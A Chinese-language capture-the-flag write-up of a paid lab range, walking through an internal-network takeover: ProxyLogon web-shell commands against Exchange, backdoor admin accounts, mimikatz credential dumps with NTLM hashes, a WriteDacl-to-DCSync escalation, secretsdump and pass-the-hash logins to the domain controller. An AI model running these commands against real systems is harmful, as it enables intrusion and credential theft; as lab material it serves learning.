内网渗透从0到-1 -- 春秋云镜 Exchange
偷学长的账号开了一个多打一秒钟都心疼的靶场 (x
速成的一些预备知识
代理转发
拿到入口机后,需要搭建代理进行后续的横向移动。
常用工具有nps,frp等。
如果是一级代理,用 nps 会很方便。
对于复杂的拓扑,可以使用Venom搭建多级代理。具体使用可以参考内网穿透之多层代理
frp要写配置文件,可能比较麻烦。搭建多级代理移步《内网渗透体系建设》
对靶场而言,FastProxy可以curl一键搭frp代理,快速好用(毕竟不用擦屁股
域用户和机器用户
当计算机加入域时,域的全局组Domain Users会被添加到计算机本地User组中。因此域用户可以在域中的任何一台计算机上登录。
本地计算机SYSTEM用户对应域中的机器用户。机器用户的格式是机器名$
在本地计算机使用SYSTEM用户可以以机器用户的权限进行域内的操作。
哈希传递攻击
入口机
用fscan扫描ip,发现开启了8000端口。华夏REP,网上的payload直接打就行。这不是本文重点,所以略过了(其实是有蓝狗
权限是root,可以写写ssh公钥。拿到flag1。
搭建代理
使用到了FastProxy
VPS
入口机
kali (proxychains)
测试一下:
内网扫描
fscan扫一下内网的C段
root@iZ8vbek17wwetibbd216xlZ:/tmp# ./fscan_amd64 -h 172.22.3.12/16
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.26 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.255.253 is alive
[*] LiveTop 172.22.0.0/16 段存活数量为: 5
[*] LiveTop 172.22.3.0/24 段存活数量为: 4
[*] Icmp alive hosts len is: 5
[*] LiveTop 172.22.255.0/24 段存活数量为: 1
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:445 open
172.22.3.9:443 open
172.22.3.9:139 open
172.22.3.26:139 open
172.22.3.2:139 open
172.22.3.9:135 open
172.22.3.2:88 open
172.22.3.2:445 open
172.22.3.26:445 open
172.22.3.9:808 open
172.22.3.9:8172 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] NetInfo:
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] WebTitle: http://172.22.3.9 code:403 len:0 title:None
[*] NetBios: 172.22.3.26 XIAORANG\XIAORANG-PC
[*] 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] NetBios: 172.22.3.2 [+]DC XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 15/15
[*] 扫描结束,耗时: 18.207334642s
总结一下:
172.22.3.2 XIAORANG-WIN16 ?
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.12 入口机 Linux
172.22.3.26 XIAORANG-PC 个人电脑
Exchange
ProxyLogon拿下SYSTEM权限账号
https://github.com/herwonowr/exprolog
proxychains python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab
proxychains curl --request POST --url https://172.22.3.9/owa/auth/ncyev.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k
添加账号之后用remmina登陆rdp,拿到flag2
net user foobar pass@123 /add
net localgroup administrators foobar /add
域控
信息搜集
域控ip
在Exchange机器上执行ipconfig /all
,发现DNS ip为172.22.3.2
,猜测这就是域控制器。
172.22.3.2 XIAORANG-WIN16 域控制器
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.12 入口机 Linux
172.22.3.26 XIAORANG-PC 个人电脑
配置remmina的share folder上传本地文件
NTLM哈希
用mimikatz搜集本机的账号哈希。
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt
Authentication Id : 0 ; 2610805 (00000000:0027d675)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/4/9 21:27:12
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
....
Authentication Id : 0 ; 62198 (00000000:0000f2f6)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/4/9 21:24:51
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 03447ce0f4a9908d77c860954baa7c1e
* SHA1 : 8c31a42bec06c14a33d41d4f4593a95a74a64a4f
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : a2 ea 2d 27 c1 2b 84 f8 53 17 d9 e1 a2 5a 3d 81 3d 43 4b aa 21 fb fc 4b 01 b6 ee ab 9b 5b 21 41 72 1e 2b ee 69 cc 6c bd b7 fc ff aa de db bb ee fc 20 94 2f 37 9a 2c 56 cc 5a df 25 e9 f9 e8 ad da 48 34 a3 c0 ab 7c ba ad e2 3d 48 c3 3e 3f a6 26 1e 10 3a fa ab 50 d6 96 ba 22 38 b2 d4 a4 b5 e8 ce ef 46 10 d6 2a f3 f4 f3 38 3c 31 7d ef bf d9 71 b7 1f 5a 1b 5d 16 84 f2 18 ae c6 74 8b 23 f6 20 8b ba 7d 54 34 56 b3 ea f6 13 27 d5 47 a6 27 1c bb 50 68 f9 72 f6 13 d5 41 b1 27 10 27 3f d9 a7 c0 d6 1a 71 20 11 06 9d 0b f4 73 98 d3 70 73 33 f0 3b 85 cc f2 cd 41 28 97 e7 e0 94 81 f2 65 0e dd e6 24 b6 81 72 b6 7d 24 1a 11 cd ee 29 04 2d 29 4d 33 d2 6e f8 0d eb de 57 d3 ef 54 23 1b bd fa c1 0b 09 88 c4 47 13 c6 5b 58 fc ac 65
ssp :
credman :
XIAORANG
域下:
Zhangtong域用户哈希:
22c7f81993e96ac83ac2f3f1903de8b4
XIAORANG-EXC01$
域用户哈希(也就是Exchange的SYSTEM用户):
03447ce0f4a9908d77c860954baa7c1e
域内环境
用BloodHound信息搜集。因为只有SYSTEM用户有域权限,所以需要用ProxyLogon的shell来执行命令。
proxychains curl --request POST --url https://172.22.3.9/owa/auth/0lafo.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("C:/Users/foobar/Desktop/BloodHound/SharpHound.exe -c all --OutputDirectory C:/Users/foobar/Desktop/").stdout.readall())' -k
导出到本地后启动neo4j和bloodhound
neo4j start
bloodhound
// neo4f 123
BloodHound 使用可参考渗透测试之内网攻防篇:使用BloodHound 分析大型域内环境
导入之后点击Find Shortest Paths to Domain Admins
发现exchange上的域用户有writeDacl权限
利用WriteDacl添加DCSync拿下域控
刚刚已经拿到了XIAORANG-EXC01$
这个机器用户的hash,所以可以先用psexec进行PTH获取exchange机子上交互式的shell,权限是SYSTEM。
proxychains python3 psexec.py -hashes :03447ce0f4a9908d77c860954baa7c1e XIAORANG/XIAORANG-EXC01\$@172.22.3.9
Write DACL权限可以直接修改用户权限 ,所以以Zhangtong的身份给Zhangtong添加DCSync权限。
powershell -command "cd C:/Users/foobar/Desktop/; Import-Module .\powerview.ps1; Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIde Zhangtong -Rights DCSync -Verbose"
有了DCSync权限后,就可以用导出域管hash,使用Zhangtong的身份PTH
proxychains python3 secretsdump.py -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc XIAORANG.LAB/Zhangtong@172.22.3.2
得到域管hash
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
用wmiexec登录域控
proxychains python3 wmiexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang/administrator@172.22.3.2
改一下编码
chcp 65001
添加用户
net user bridge pass@123 /add
net localgroup administrators bridge /add
rdp登录,拿到flag4
个人电脑
最后一个flag在172.22.3.26 XIAORANG-PC 个人电脑上的lumia用户桌面上。
在域控服务器上用Active Directory把lumia密码给改了
登录172.22.3.26的rdp后发现桌面有一个secret.zip,需要解压密码。然后就是最喜欢的对脑洞环节:用lumia登录Exchange,发现有两封邮件,一份是提示密码是手机号,一份给了很多手机号。用工具导入手机号爆破密码,解压得到flag3
说废话
这玩意好贵...开1h够吃一顿南区乐
REFs
渗透测试之内网攻防篇:使用BloodHound 分析大型域内环境
《内网渗透体系建设》